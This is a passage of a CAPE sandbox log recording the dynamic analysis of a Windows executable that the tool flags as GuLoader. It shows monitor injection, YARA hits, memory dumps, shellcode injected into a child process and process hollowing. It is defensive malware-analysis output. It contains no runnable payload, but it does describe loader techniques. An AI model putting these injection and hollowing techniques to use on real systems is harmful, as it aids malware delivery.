23:33:59,950 [root] DEBUG: initializing analysis package \"exe\"...\n2025-02-27 23:33:59,950 [lib.common.common] INFO: wrapping\n2025-02-27 23:33:59,950 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-02-27 23:33:59,950 [root] DEBUG: New location of moved file: C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\n2025-02-27 23:33:59,950 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option\n2025-02-27 23:33:59,950 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option\n2025-02-27 23:33:59,950 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option\n2025-02-27 23:33:59,950 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option\n2025-02-27 23:33:59,966 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.browser\"\n2025-02-27 23:33:59,966 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.digisig\"\n2025-02-27 23:33:59,981 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.disguise\"\n2025-02-27 23:33:59,981 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.human\"\n2025-02-27 23:33:59,981 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'\n2025-02-27 23:34:00,059 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'\n2025-02-27 23:34:00,059 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'\n2025-02-27 23:34:00,059 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.screenshots\"\n2025-02-27 23:34:00,153 [root] DEBUG: Imported auxiliary module \"modules.auxiliary.tlsdump\"\n2025-02-27 23:34:00,153 [root] DEBUG: Initialized auxiliary module \"Browser\"\n2025-02-27 23:34:00,153 [root] DEBUG: attempting to configure 'Browser' from data\n2025-02-27 23:34:00,153 [root] DEBUG: module Browser does not support data configuration, ignoring\n2025-02-27 23:34:00,153 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.browser\"...\n2025-02-27 23:34:00,263 [root] DEBUG: Started auxiliary module modules.auxiliary.browser\n2025-02-27 23:34:00,263 [root] DEBUG: Initialized auxiliary module \"DigiSig\"\n2025-02-27 23:34:00,263 [root] DEBUG: attempting to configure 'DigiSig' from data\n2025-02-27 23:34:00,263 [root] DEBUG: module DigiSig does not support data configuration, ignoring\n2025-02-27 23:34:00,263 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.digisig\"...\n2025-02-27 23:34:00,263 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature\n2025-02-27 23:34:02,216 [modules.auxiliary.digisig] DEBUG: File is not signed\n2025-02-27 23:34:02,216 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json\n2025-02-27 23:34:02,216 [root] DEBUG: Started auxiliary module modules.auxiliary.digisig\n2025-02-27 23:34:02,216 [root] DEBUG: Initialized auxiliary module \"Disguise\"\n2025-02-27 23:34:02,216 [root] DEBUG: attempting to configure 'Disguise' from data\n2025-02-27 23:34:02,216 [root] DEBUG: module Disguise does not support data configuration, ignoring\n2025-02-27 23:34:02,216 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.disguise\"...\n2025-02-27 23:34:02,216 [modules.auxiliary.disguise] INFO: Disguising GUID to 8b490c64-8c0c-4abc-841c-d5828e57a3de\n2025-02-27 23:34:02,216 [root] DEBUG: Started auxiliary module modules.auxiliary.disguise\n2025-02-27 23:34:02,216 [root] DEBUG: Initialized auxiliary module \"Human\"\n2025-02-27 23:34:02,216 [root] DEBUG: attempting to configure 'Human' from data\n2025-02-27 23:34:02,231 [root] DEBUG: module Human does not support data configuration, ignoring\n2025-02-27 23:34:02,231 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.human\"...\n2025-02-27 23:34:02,231 [root] DEBUG: Started auxiliary module modules.auxiliary.human\n2025-02-27 23:34:02,231 [root] DEBUG: Initialized auxiliary module \"Screenshots\"\n2025-02-27 23:34:02,231 [root] DEBUG: attempting to configure 'Screenshots' from data\n2025-02-27 23:34:02,231 [root] DEBUG: module Screenshots does not support data configuration, ignoring\n2025-02-27 23:34:02,231 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.screenshots\"...\n2025-02-27 23:34:02,231 [root] DEBUG: Started auxiliary module modules.auxiliary.screenshots\n2025-02-27 23:34:02,231 [root] DEBUG: Initialized auxiliary module \"TLSDumpMasterSecrets\"\n2025-02-27 23:34:02,231 [root] DEBUG: attempting to configure 'TLSDumpMasterSecrets' from data\n2025-02-27 23:34:02,231 [root] DEBUG: module TLSDumpMasterSecrets does not support data configuration, ignoring\n2025-02-27 23:34:02,231 [root] DEBUG: Trying to start auxiliary module \"modules.auxiliary.tlsdump\"...\n2025-02-27 23:34:02,247 [modules.auxiliary.tlsdump] INFO: lsass.exe found, pid 672\n2025-02-27 23:34:02,278 [lib.api.process] INFO: Monitor config for : C:\\tmpocdzpyju\\dll\\672.ini\n2025-02-27 23:34:02,278 [lib.api.process] INFO: Option 'tlsdump' with value '1' sent to monitor\n2025-02-27 23:34:02,278 [lib.api.process] INFO: 64-bit DLL to inject is C:\\tmpocdzpyju\\dll\\dRIiqwOa.dll, loader C:\\tmpocdzpyju\\bin\\OEmvGahq.exe\n2025-02-27 23:34:02,294 [root] DEBUG: Loader: Injecting process 672 with C:\\tmpocdzpyju\\dll\\dRIiqwOa.dll.\n2025-02-27 23:34:02,309 [root] DEBUG: 672: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-02-27 23:34:02,309 [root] INFO: Disabling sleep skipping.\n2025-02-27 23:34:02,309 [root] DEBUG: 672: TLS secret dump mode enabled.\n2025-02-27 23:34:02,309 [root] DEBUG: 672: RtlInsertInvertedFunctionTable 0x00007FF8138C090E, LdrpInvertedFunctionTableSRWLock 0x00007FF813A1D500\n2025-02-27 23:34:02,309 [root] DEBUG: 672: Monitor initialised: 64-bit capemon loaded in process 672 at 0x00007FFFDA630000, thread 4396, image base 0x00007FF7BECB0000, stack from 0x000000A91A1F2000-0x000000A91A200000\n2025-02-27 23:34:02,309 [root] DEBUG: 672: Commandline: C:\\Windows\\system32\\lsass.exe\n2025-02-27 23:34:02,341 [root] DEBUG: 672: Hooked 5 out of 5 functions\n2025-02-27 23:34:02,341 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.\n2025-02-27 23:34:02,341 [root] DEBUG: Successfully injected DLL C:\\tmpocdzpyju\\dll\\dRIiqwOa.dll.\n2025-02-27 23:34:02,341 [lib.api.process] INFO: Injected into 64-bit \n2025-02-27 23:34:02,341 [root] DEBUG: Started auxiliary module modules.auxiliary.tlsdump\n2025-02-27 23:34:02,356 [root] DEBUG: 672: TLS 1.2 secrets logged to: C:\\KyIbqcSeMB\\tlsdump\\tlsdump.log\n2025-02-27 23:34:09,174 [root] INFO: Restarting WMI Service\n2025-02-27 23:34:10,126 [root] DEBUG: package modules.packages.exe does not support configure, ignoring\n2025-02-27 23:34:10,126 [root] WARNING: configuration error for package modules.packages.exe: error importing data.packages.exe: No module named 'data.packages'\n2025-02-27 23:34:10,126 [lib.core.compound] INFO: C:\\Users\\pacop\\AppData\\Local\\Temp already exists, skipping creation\n2025-02-27 23:34:10,166 [lib.api.process] INFO: Successfully executed process from path \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\" with arguments \"\" with pid 9224\n2025-02-27 23:34:10,166 [lib.api.process] INFO: Monitor config for : C:\\tmpocdzpyju\\dll\\9224.ini\n2025-02-27 23:34:10,207 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmpocdzpyju\\dll\\GGltloyK.dll, loader C:\\tmpocdzpyju\\bin\\hVmoBDR.exe\n2025-02-27 23:34:10,460 [root] DEBUG: Loader: Injecting process 9224 (thread 3892) with C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:10,500 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-02-27 23:34:10,510 [root] DEBUG: Successfully injected DLL C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:10,561 [lib.api.process] INFO: Injected into 32-bit \n2025-02-27 23:34:12,581 [lib.api.process] INFO: Successfully resumed \n2025-02-27 23:34:12,641 [root] DEBUG: 9224: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-02-27 23:34:12,733 [root] INFO: Disabling sleep skipping.\n2025-02-27 23:34:12,753 [root] DEBUG: 9224: Dropped file limit defaulting to 100.\n2025-02-27 23:34:12,771 [root] DEBUG: 9224: YaraInit: Compiled 41 rule files\n2025-02-27 23:34:12,794 [root] DEBUG: 9224: YaraInit: Compiled rules saved to file C:\\tmpocdzpyju\\data\\yara\\capemon.yac\n2025-02-27 23:34:12,794 [root] DEBUG: 9224: YaraScan: Scanning 0x00400000, size 0x1664e\n2025-02-27 23:34:12,794 [root] DEBUG: 9224: AmsiDumper initialised.\n2025-02-27 23:34:12,802 [root] DEBUG: 9224: Monitor initialised: 32-bit capemon loaded in process 9224 at 0x73340000, thread 3892, image base 0x400000, stack from 0x193000-0x1a0000\n2025-02-27 23:34:12,802 [root] DEBUG: 9224: Commandline: \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\"\n2025-02-27 23:34:12,885 [root] DEBUG: 9224: hook_api: LdrpCallInitRoutine export address 0x771C3190 obtained via GetFunctionAddress\n2025-02-27 23:34:12,895 [root] DEBUG: 9224: hook_api: Warning - SetWindowLongW export address 0x76645E90 differs from GetProcAddress -> 0x74F47150 (apphelp.dll::0x37150)\n2025-02-27 23:34:12,895 [root] DEBUG: 9224: hook_api: Warning - EnumDisplayDevicesA export address 0x7663A090 differs from GetProcAddress -> 0x74F484C0 (apphelp.dll::0x384c0)\n2025-02-27 23:34:12,916 [root] DEBUG: 9224: hook_api: Warning - EnumDisplayDevicesW export address 0x76650860 differs from GetProcAddress -> 0x74F6C1B0 (apphelp.dll::0x5c1b0)\n2025-02-27 23:34:12,926 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-02-27 23:34:12,926 [root] DEBUG: 9224: set_hooks: Unable to hook GetCommandLineA\n2025-02-27 23:34:12,954 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-02-27 23:34:13,108 [root] DEBUG: 9224: set_hooks: Unable to hook GetCommandLineW\n2025-02-27 23:34:13,250 [root] DEBUG: 9224: Hooked 611 out of 613 functions\n2025-02-27 23:34:13,320 [root] DEBUG: 9224: Syscall hook installed, syscall logging level 1\n2025-02-27 23:34:13,331 [root] DEBUG: 9224: WoW64fix: Windows version 6.2 not supported.\n2025-02-27 23:34:13,331 [root] INFO: Loaded monitor into process with pid 9224\n2025-02-27 23:34:13,451 [root] DEBUG: 9224: InstrumentationCallback: Added region at 0x763D0000 to tracked regions list (thread 3892).\n2025-02-27 23:34:13,484 [root] DEBUG: 9224: caller_dispatch: Added region at 0x00400000 to tracked regions list (ntdll::NtAllocateVirtualMemory returns to 0x004011CE, thread 3892).\n2025-02-27 23:34:13,635 [root] DEBUG: 9224: YaraScan: Scanning 0x00400000, size 0x1664e\n2025-02-27 23:34:13,716 [root] DEBUG: 9224: ProcessImageBase: Main module image at 0x00400000 unmodified (entropy change 0.000000e+00)\n2025-02-27 23:34:13,767 [root] DEBUG: 9224: DLL loaded at 0x74F00000: C:\\Windows\\SYSTEM32\\kernel.appcore (0xf000 bytes).\n2025-02-27 23:34:13,838 [root] DEBUG: 9224: DLL loaded at 0x76370000: C:\\Windows\\System32\\bcryptPrimitives (0x5f000 bytes).\n2025-02-27 23:34:13,858 [root] DEBUG: 9224: DLL loaded at 0x74E80000: C:\\Windows\\system32\\uxtheme (0x74000 bytes).\n2025-02-27 23:34:13,868 [root] DEBUG: 9224: ProtectionHandler: Adding region at 0x02250000 to tracked regions.\n2025-02-27 23:34:13,917 [root] DEBUG: 9224: DLL loaded at 0x739A0000: C:\\Windows\\SYSTEM32\\SXS (0x87000 bytes).\n2025-02-27 23:34:13,988 [root] DEBUG: 9224: DLL loaded at 0x75650000: C:\\Windows\\System32\\MSCTF (0xd4000 bytes).\n2025-02-27 23:34:14,040 [root] DEBUG: 9224: DumpPEsInRange: Scanning range 0x02250000 - 0x02259601.\n2025-02-27 23:34:14,283 [root] DEBUG: 9224: ScanForDisguisedPE: No PE image located in range 0x02250000-0x02259601.\n2025-02-27 23:34:14,352 [lib.common.results] INFO: Uploading file C:\\KyIbqcSeMB\\CAPE\\9224_853329914342227422025 to CAPE\\9de676b22a900194fd11c41539f2df6b0ebb6d9d24f1a413c342c535aa40a406; Size is 38401; Max size: 100000000\n2025-02-27 23:34:14,435 [root] DEBUG: 9224: DumpMemory: Payload successfully created: C:\\KyIbqcSeMB\\CAPE\\9224_853329914342227422025 (size 38401 bytes)\n2025-02-27 23:34:14,465 [root] DEBUG: 9224: DumpRegion: Dumped entire allocation from 0x02250000, size 40960 bytes.\n2025-02-27 23:34:14,564 [root] DEBUG: 9224: ProcessTrackedRegion: Dumped region at 0x02250000.\n2025-02-27 23:34:14,566 [root] DEBUG: 9224: YaraScan: Scanning 0x02250000, size 0x9601\n2025-02-27 23:34:15,659 [root] DEBUG: 9224: DLL loaded at 0x76220000: C:\\Windows\\System32\\coml2 (0x5e000 bytes).\n2025-02-27 23:34:15,815 [root] DEBUG: 9224: api-rate-cap: memcpy hook disabled due to rate\n2025-02-27 23:34:15,925 [root] DEBUG: 9224: DLL loaded at 0x73A30000: C:\\Windows\\SYSTEM32\\ntmarta (0x29000 bytes).\n2025-02-27 23:34:15,925 [root] DEBUG: 9224: DLL loaded at 0x738A0000: C:\\Windows\\System32\\CoreMessaging (0x9b000 bytes).\n2025-02-27 23:34:15,940 [root] DEBUG: 9224: DLL loaded at 0x72DC0000: C:\\Windows\\SYSTEM32\\wintypes (0xdd000 bytes).\n2025-02-27 23:34:15,940 [root] DEBUG: 9224: DLL loaded at 0x75BB0000: C:\\Windows\\System32\\SHCORE (0x87000 bytes).\n2025-02-27 23:34:15,940 [root] DEBUG: 9224: DLL loaded at 0x72EA0000: C:\\Windows\\System32\\CoreUIComponents (0x27f000 bytes).\n2025-02-27 23:34:15,940 [root] DEBUG: 9224: DLL loaded at 0x73120000: C:\\Windows\\SYSTEM32\\textinputframework (0xb9000 bytes).\n2025-02-27 23:34:17,019 [root] DEBUG: 9224: AllocationHandler: Adding allocation to tracked region list: 0x02410000, size: 0x12000.\n2025-02-27 23:34:17,112 [root] DEBUG: 9224: AddTrackedRegion: GetEntropy failed.\n2025-02-27 23:34:17,190 [root] DEBUG: 9224: AllocationHandler: Processing previous tracked region at: 0x02250000.\n2025-02-27 23:34:17,237 [root] DEBUG: 9224: DumpPEsInRange: Scanning range 0x02410000 - 0x0241D9A8.\n2025-02-27 23:34:17,315 [root] DEBUG: 9224: ScanForDisguisedPE: No PE image located in range 0x02410000-0x0241D9A8.\n2025-02-27 23:34:17,706 [lib.common.results] INFO: Uploading file C:\\KyIbqcSeMB\\CAPE\\9224_44383501714128522025 to CAPE\\7ba8da946c15dab16acfc7e0c9196e671704fdef5ca147f793ec9db731c94a52; Size is 55720; Max size: 100000000\n2025-02-27 23:34:17,956 [root] DEBUG: 9224: DumpMemory: Payload successfully created: C:\\KyIbqcSeMB\\CAPE\\9224_44383501714128522025 (size 55720 bytes)\n2025-02-27 23:34:17,956 [root] DEBUG: 9224: DumpRegion: Dumped entire allocation from 0x02410000, size 73728 bytes.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: ProcessTrackedRegion: Dumped region at 0x02410000.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: YaraScan: Scanning 0x02410000, size 0xd9a8\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: YaraScan hit: GuloaderB\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: Config: bp0 set to 0x0000B128.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: Config: Action0 set to ret.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: Config: bp1 set to 0x0000AA1F.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: Config: Action1 set to ret:2.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: Config: bp2 set to 0x0000A204.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: Config: Action2 set to goto:ntdll::NtAllocateVirtualMemory.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: Config: Trace instruction count set to 0x0\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: Config: bp3 set to 0x00001B62.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: Config: Action3 set to skip.\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: SetInitialBreakpoints: Breakpoint 0 set on address 0x0241B128 (RVA 0xb128, type 0, hit count 0, thread 3892)\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: SetInitialBreakpoints: Breakpoint 1 set on address 0x0241AA1F (RVA 0xaa1f, type 0, hit count 0, thread 3892)\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: SetInitialBreakpoints: Breakpoint 2 set on address 0x0241A204 (RVA 0xa204, type 0, hit count 0, thread 3892)\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: SetInitialBreakpoints: Breakpoint 3 set on address 0x02411B62 (RVA 0x1b62, type 0, hit count 0, thread 3892)\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: CAPEExceptionFilter: breakpoint 0 hit by instruction at 0x0241B128 (thread 3892)\n2025-02-27 23:34:17,972 [root] DEBUG: 9224: DebuggerOutput: Debugger logfile C:\\KyIbqcSeMB\\debugger\\9224.log.\n2025-02-27 23:34:17,987 [root] DEBUG: 9224: CAPEExceptionFilter: breakpoint 1 hit by instruction at 0x0241AA1F (thread 3892)\n2025-02-27 23:34:17,987 [root] DEBUG: 9224: RtlDispatchException: skipped instruction at 0x241bb2f writing to ntdll (0x771c5560 - 0x75560)\n2025-02-27 23:34:18,003 [root] DEBUG: 9224: CAPEExceptionFilter: breakpoint 2 hit by instruction at 0x0241A204 (thread 3892)\n2025-02-27 23:34:18,019 [root] DEBUG: 9224: InstrumentationCallback: Added region at 0x75860000 to tracked regions list (thread 3892).\n2025-02-27 23:34:18,019 [root] DEBUG: 9224: DLL loaded at 0x75C40000: C:\\Windows\\System32\\SHELL32 (0x5da000 bytes).\n2025-02-27 23:34:18,019 [root] DEBUG: 9224: DLL loaded at 0x72B20000: C:\\Windows\\SYSTEM32\\Msi (0x29b000 bytes).\n2025-02-27 23:34:18,050 [root] DEBUG: 9224: CAPEExceptionFilter: breakpoint 3 hit by instruction at 0x02411B62 (thread 3892)\n2025-02-27 23:34:18,050 [root] DEBUG: 9224: CreateProcessHandler: Injection info set for new process 3552: C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe, ImageBase: 0x00400000\n2025-02-27 23:34:18,050 [root] INFO: Announced 32-bit process name: f1ffd3c13b7bd7f498e8.exe pid: 3552\n2025-02-27 23:34:18,050 [lib.api.process] INFO: Monitor config for : C:\\tmpocdzpyju\\dll\\3552.ini\n2025-02-27 23:34:18,050 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmpocdzpyju\\dll\\GGltloyK.dll, loader C:\\tmpocdzpyju\\bin\\hVmoBDR.exe\n2025-02-27 23:34:18,050 [root] DEBUG: Loader: Injecting process 3552 (thread 2840) with C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,050 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-02-27 23:34:18,050 [root] DEBUG: Successfully injected DLL C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,065 [lib.api.process] INFO: Injected into 32-bit \n2025-02-27 23:34:18,065 [root] INFO: Announced 32-bit process name: f1ffd3c13b7bd7f498e8.exe pid: 3552\n2025-02-27 23:34:18,065 [lib.api.process] INFO: Monitor config for : C:\\tmpocdzpyju\\dll\\3552.ini\n2025-02-27 23:34:18,065 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmpocdzpyju\\dll\\GGltloyK.dll, loader C:\\tmpocdzpyju\\bin\\hVmoBDR.exe\n2025-02-27 23:34:18,065 [root] DEBUG: Loader: Injecting process 3552 (thread 2840) with C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,065 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-02-27 23:34:18,065 [root] DEBUG: Successfully injected DLL C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,065 [lib.api.process] INFO: Injected into 32-bit \n2025-02-27 23:34:18,065 [root] INFO: Announced 32-bit process name: f1ffd3c13b7bd7f498e8.exe pid: 3552\n2025-02-27 23:34:18,065 [lib.api.process] INFO: Monitor config for : C:\\tmpocdzpyju\\dll\\3552.ini\n2025-02-27 23:34:18,081 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmpocdzpyju\\dll\\GGltloyK.dll, loader C:\\tmpocdzpyju\\bin\\hVmoBDR.exe\n2025-02-27 23:34:18,081 [root] DEBUG: Loader: Injecting process 3552 (thread 2840) with C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,081 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.\n2025-02-27 23:34:18,081 [root] DEBUG: Successfully injected DLL C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,081 [lib.api.process] INFO: Injected into 32-bit \n2025-02-27 23:34:18,081 [root] DEBUG: 9224: CAPEExceptionFilter: breakpoint 2 hit by instruction at 0x0241A204 (thread 3892)\n2025-02-27 23:34:18,081 [root] DEBUG: 9224: WriteMemoryHandler: shellcode at 0x02410000 (size 0xf000) injected into process 3552.\n2025-02-27 23:34:18,081 [lib.common.results] INFO: Uploading file C:\\KyIbqcSeMB\\CAPE\\9224_9668161814128522025 to CAPE\\1873c5c5cffffab00f4ef55631a0fae59edf000616404fbe722c3fc20bc4d2ed; Size is 55720; Max size: 100000000\n2025-02-27 23:34:18,097 [root] DEBUG: 9224: DumpMemory: Payload successfully created: C:\\KyIbqcSeMB\\CAPE\\9224_9668161814128522025 (size 55720 bytes)\n2025-02-27 23:34:18,097 [root] DEBUG: 9224: WriteMemoryHandler: Dumped injected code/data from buffer.\n2025-02-27 23:34:18,097 [root] INFO: Announced 32-bit process name: f1ffd3c13b7bd7f498e8.exe pid: 3552\n2025-02-27 23:34:18,097 [lib.api.process] INFO: Monitor config for : C:\\tmpocdzpyju\\dll\\3552.ini\n2025-02-27 23:34:18,097 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmpocdzpyju\\dll\\GGltloyK.dll, loader C:\\tmpocdzpyju\\bin\\hVmoBDR.exe\n2025-02-27 23:34:18,097 [root] DEBUG: Loader: Injecting process 3552 (thread 2840) with C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,097 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-02-27 23:34:18,097 [root] DEBUG: Successfully injected DLL C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,097 [lib.api.process] INFO: Injected into 32-bit \n2025-02-27 23:34:18,097 [root] DEBUG: 9224: SetThreadContextHandler: Hollow process entry point reset via NtSetContextThread to 0x000011C4 (process 3552).\n2025-02-27 23:34:18,097 [root] INFO: Announced 32-bit process name: f1ffd3c13b7bd7f498e8.exe pid: 3552\n2025-02-27 23:34:18,097 [lib.api.process] INFO: Monitor config for : C:\\tmpocdzpyju\\dll\\3552.ini\n2025-02-27 23:34:18,097 [lib.api.process] INFO: 32-bit DLL to inject is C:\\tmpocdzpyju\\dll\\GGltloyK.dll, loader C:\\tmpocdzpyju\\bin\\hVmoBDR.exe\n2025-02-27 23:34:18,112 [root] DEBUG: Loader: Injecting process 3552 (thread 2840) with C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,112 [root] DEBUG: InjectDllViaIAT: This image has already been patched.\n2025-02-27 23:34:18,112 [root] DEBUG: Successfully injected DLL C:\\tmpocdzpyju\\dll\\GGltloyK.dll.\n2025-02-27 23:34:18,112 [lib.api.process] INFO: Injected into 32-bit \n2025-02-27 23:34:18,206 [root] INFO: Added new file to list with pid None and path C:\\Users\\pacop\\AppData\\Local\\Temp\\~DF888F0BBEA54E1504.TMP\n2025-02-27 23:34:18,284 [root] DEBUG: 3552: Python path set to 'C:\\Users\\pacop\\AppData\\Local\\Programs\\Python\\Python310-32'.\n2025-02-27 23:34:18,331 [root] INFO: Process with pid 9224 has terminated\n2025-02-27 23:34:18,378 [root] DEBUG: 3552: Dropped file limit defaulting to 100.\n2025-02-27 23:34:18,409 [root] DEBUG: 9224: NtTerminateProcess hook: Attempting to dump process 9224\n2025-02-27 23:34:18,565 [root] DEBUG: 9224: DoProcessDump: Skipping process dump as code is identical on disk.\n2025-02-27 23:34:18,597 [root] INFO: Disabling sleep skipping.\n2025-02-27 23:34:18,597 [root] DEBUG: 9224: DumpPEsInRange: Scanning range 0x02410000 - 0x0241D9A8.\n2025-02-27 23:34:18,597 [root] DEBUG: 3552: YaraInit: Compiled rules loaded from existing file C:\\tmpocdzpyju\\data\\yara\\capemon.yac\n2025-02-27 23:34:18,597 [root] DEBUG: 9224: ScanForDisguisedPE: No PE image located in range 0x02410000-0x0241D9A8.\n2025-02-27 23:34:18,612 [root] DEBUG: 3552: YaraScan: Scanning 0x00400000, size 0x15c81a\n2025-02-27 23:34:18,612 [root] DEBUG: 3552: CAPE_init: Main executable image temporarily remapped for scanning at 0x02310000\n2025-02-27 23:34:18,628 [root] DEBUG: 3552: YaraScan: Scanning 0x02310000, size 0x1564e\n2025-02-27 23:34:18,628 [lib.common.results] INFO: Uploading file C:\\KyIbqcSeMB\\CAPE\\9224_194830201814128522025 to CAPE\\1873c5c5cffffab00f4ef55631a0fae59edf000616404fbe722c3fc20bc4d2ed; Size is 55720; Max size: 100000000\n2025-02-27 23:34:18,628 [root] DEBUG: 3552: AmsiDumper initialised.\n2025-02-27 23:34:18,628 [root] DEBUG: 9224: DumpMemory: Payload successfully created: C:\\KyIbqcSeMB\\CAPE\\9224_194830201814128522025 (size 55720 bytes)\n2025-02-27 23:34:18,628 [root] DEBUG: 3552: Monitor initialised: 32-bit capemon loaded in process 3552 at 0x73340000, thread 2840, image base 0x400000, stack from 0x196000-0x1a0000\n2025-02-27 23:34:18,628 [root] DEBUG: 9224: DumpRegion: Dumped entire allocation from 0x02410000, size 73728 bytes.\n2025-02-27 23:34:18,628 [root] DEBUG: 3552: Commandline: \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1ffd3c13b7bd7f498e8.exe\"\n2025-02-27 23:34:18,628 [root] DEBUG: 9224: ProcessTrackedRegion: Dumped region at 0x02410000.\n2025-02-27 23:34:18,659 [root] DEBUG: 9224: YaraScan: Scanning 0x02410000, size 0xd9a8\n2025-02-27 23:34:18,675 [root] DEBUG: 9224: YaraScan hit: GuloaderB\n2025-02-27 23:34:18,675 [root] DEBUG: 9224: Config: Action0 set to ret.\n2025-02-27 23:34:18,675 [root] DEBUG: 9224: Config: Action1 set to ret:2.\n2025-02-27 23:34:18,675 [root] DEBUG: 9224: Config: Action2 set to goto:ntdll::NtAllocateVirtualMemory.\n2025-02-27 23:34:18,675 [root] DEBUG: 9224: Config: Trace instruction count set to 0x0\n2025-02-27 23:34:18,675 [root] DEBUG: 9224: Config: Action3 set to skip.\n2025-02-27 23:34:18,987 [root] DEBUG: 3552: hook_api: LdrpCallInitRoutine export address 0x771C3190 obtained via GetFunctionAddress\n2025-02-27 23:34:19,050 [root] WARNING: b'Unable to place hook on GetCommandLineA'\n2025-02-27 23:34:19,050 [root] DEBUG: 3552: set_hooks: Unable to hook GetCommandLineA\n2025-02-27 23:34:19,050 [root] WARNING: b'Unable to place hook on GetCommandLineW'\n2025-02-27 23:34:19,065 [root] DEBUG: 3552: set_hooks: Unable to hook GetCommandLineW\n2025-02-27 23:34:19,128 [root] DEBUG: 3552: Hooked 611 out of 613 functions\n2025-02-27 23:34:19,159 [root] DEBUG: 3552: Syscall hook installed, syscall logging level 1\n2025-02-27 23:34:19,190 [root] DEBUG: 3552: WoW64fix: Windows version 6.2 not supported.\n2025-02-27 23:34:19,440 [root] INFO: Loaded monitor into process with pid 3552\n2025-02-27 23:34:19,456 [root] DEBUG: 3552: TrackExecution: Added region at 0x00560000 to tracked regions list (address 0x00560000, thread 2840).\n2025-02-27 23:34:19,487 [root] DEBUG: 3552: DumpPEsInRange: Scanning range 0x00560000 - 0x0056D9A8.\n2025-02-27 23:34:19,534 [root] DEBUG: 3552: ScanForDisguisedPE: No PE image located in range 0x00560000-0x0056D9A8.\n2025-02-27 23:34:19,581 [lib.common.results] INFO: Uploading file C:\\KyIbqcSeMB\\CAPE\\3552_57100621914128522025 to CAPE\\1873c5c5cffffab00f4ef55631a0fae59edf000616404fbe722c3fc20bc4d2ed; Size is 55720; Max size: 100000000\n2025-02-27 23:34:19,862 [root] DEBUG: 3552: DumpMemory: Payload successfully created: C:\\KyIbqcSeMB\\CAPE\\3552_57100621914128522025 (size 55720 bytes)\n2025-02-27 23:34:20,190 [root] DEBUG: 3552: DumpRegion: Dumped entire allocation from 0x00560000, size 1048576 bytes.\n2025-02-27 23:34:20,222 [root] DEBUG: 3552: ProcessTrackedRegion: Dumped region at 0x00560000.\n2025-02-27 23:34:20,237 [root] DEBUG: 3552: YaraScan: Scanning 0x00560000, size 0xd9a8\n2025-02-27 23:34:20,284 